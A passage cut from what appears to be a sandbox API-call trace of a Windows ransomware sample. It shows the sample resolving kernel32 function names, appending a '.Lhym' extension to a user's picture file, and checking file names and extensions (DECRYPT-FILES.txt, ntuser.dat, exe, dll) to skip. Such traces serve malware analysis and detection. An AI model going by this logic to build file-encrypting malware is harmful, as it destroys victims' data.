lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0086.393] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0086.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0086.393] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0086.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0086.393] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0086.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0086.393] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0086.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0086.393] lstrlenA (lpString="CREATEFILEW") returned 11 [0086.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0086.393] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0086.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0086.393] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0086.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0086.393] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0086.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0086.393] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0086.393] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0086.393] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0086.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0086.394] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0086.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0086.394] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0086.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0086.394] lstrlenA (lpString="CREATEJOBSET") returned 12 [0086.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0086.394] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0086.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0086.394] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0086.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0086.394] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0086.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0086.394] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0086.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0086.394] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0086.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0086.394] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0086.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0086.394] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0086.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0086.394] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0086.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0086.394] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0086.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0086.394] lstrlenA (lpString="CREATEPIPE") returned 10 [0086.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0086.394] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0086.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0086.394] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0086.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0086.394] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0086.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0086.394] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0086.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0086.394] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0086.394] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0086.395] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0086.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0086.395] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0086.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0086.395] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0086.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0086.395] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0086.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0086.395] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0086.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0086.395] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0086.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0086.395] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0086.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0086.395] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0086.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0086.395] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0086.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0086.395] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0086.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0086.395] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0086.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0086.395] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0086.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0086.395] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0086.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0086.395] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0086.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0086.395] lstrlenA (lpString="CREATETHREAD") returned 12 [0086.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0086.395] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0086.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0086.395] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0086.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0086.395] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0086.395] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0086.396] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0086.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0086.396] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0086.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0086.396] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0086.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0086.396] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0086.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0086.396] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0086.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0086.396] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0086.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0086.396] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0086.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0086.396] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0086.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0086.396] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0086.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0086.396] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0086.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0086.396] lstrlenA (lpString="CTRLROUTINE") returned 11 [0086.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0086.396] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0086.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0086.396] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0086.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0086.396] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0086.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0086.396] lstrlenA (lpString="DEBUGBREAK") returned 10 [0086.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0086.396] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0086.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0086.396] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0086.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0086.396] lstrlenA (lpString="DECODEPOINTER") returned 13 [0086.396] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0086.396] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0086.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0086.397] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0086.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0086.397] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0086.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0086.397] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0086.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0086.397] lstrlenA (lpString="DELETEATOM") returned 10 [0086.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0086.397] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0086.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0086.397] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0086.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0086.397] lstrlenA (lpString="DELETEFIBER") returned 11 [0086.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0086.397] lstrlenA (lpString="DELETEFILEA") returned 11 [0086.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0086.397] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0086.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0086.397] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0086.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0086.397] lstrlenA (lpString="DELETEFILEW") returned 11 [0086.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0086.397] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0086.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0086.397] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0086.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0086.397] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0086.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0086.397] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0086.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0086.397] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0086.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0086.397] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0086.397] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0086.397] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0086.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0086.398] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0086.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0086.398] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0086.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0086.398] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0086.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0086.398] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0086.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0086.398] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0086.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0086.398] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0086.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0086.398] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0086.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0086.398] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0086.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0086.398] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0086.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0086.398] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0086.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0086.398] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0086.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0086.398] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0086.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0086.398] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0086.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0086.398] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0086.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0086.398] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0086.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0086.398] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0086.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0086.398] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0086.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0086.398] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0086.398] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0086.399] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0086.399] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0086.399] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0086.399] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0086.399] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0086.399] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0086.399] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0086.399] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0086.399] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0086.399] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0086.399] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0086.399] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0086.399] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0086.399] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0086.399] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0086.399] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0086.399] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0086.399] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\J5SxN.gif") returned 54 [0086.399] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\J5SxN.gif.Lhym") returned 59 [0086.399] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\J5SxN.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\j5sxn.gif"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\J5SxN.gif.Lhym" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\ntwgr\\j5sxn.gif.lhym"), dwFlags=0x0) returned 1 [0086.400] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.400] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.400] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0086.401] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf840f00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaf840f00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaf840f00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0086.401] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0086.401] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0086.401] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0086.401] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0086.401] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0086.401] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0086.401] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0086.401] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0086.401] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0086.401] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0086.401] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0086.401] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0086.401] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0086.401] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0086.401] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0086.401] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") returned 45 [0086.401] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0086.401] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\nTwgr\\") 